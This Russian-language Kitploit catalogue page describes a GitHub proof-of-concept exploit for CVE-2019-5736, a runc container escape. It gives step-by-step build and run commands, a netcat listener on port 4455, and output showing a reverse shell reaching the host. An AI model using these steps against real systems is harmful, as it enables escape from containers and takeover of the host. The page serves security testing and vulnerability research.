Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-5736-PoC-2 — Эксплойт Proof-of-concept для CVE-2019-5736, уязвимости побега из контейнера в runc, обеспечивающий доступ к оболочке хоста через выход из Docker-контейнера. | Kitploit
Инструменты/GitHubGitHub/yyqs2008/cve-2019-5736-poc-2
Повышение привилегийБезопасность контейнеровАнализ уязвимостейЭксплуатацияRed TeamingПобег из Контейнера
GitHubyyqs2008/cve-2019-5736-poc-2

CVE-2019-5736-PoC-2

Эксплойт Proof-of-concept для CVE-2019-5736, уязвимости побега из контейнера в runc, обеспечивающий доступ к оболочке хоста через выход из Docker-контейнера.

Репозиторий
1157 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Обзор

Это эксплойт из следующего репозитория, адаптированный для работы в Docker-образе.

https://github.com/feexd/pocs

Использование

Создание образа

$ git clone https://github.com/k-onishi/CVE-2019-5736-PoC
$ cd CVE-2019-5736-PoC
$ make
$ sudo docker build -t poc .

Запуск

Запуск контейнера и прослушивание порта на стороне хоста.

# terminal 1
$ sudo docker run poc

# terminal 2
$ nc -lvp 4455
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455

Запуск runc.

# terminal 3
$ sudo docker ps --format {{.Names}}
modest_lalande
docker exec -it modest_lalande /bin/sh

В nc возвращается shell.

# terminal 2
$ nc -lvp 4455
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455
sh: このシェルではジョブ制御が無効になっています
sh-4.2#

Тестовая среда

$ uname -a
Linux CVE-2019-5736-CentOS 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
$ sudo cat /etc/redhat-release
CentOS Linux release 7.5.1804 (Core)

Демо

Demo

Скачать инструмент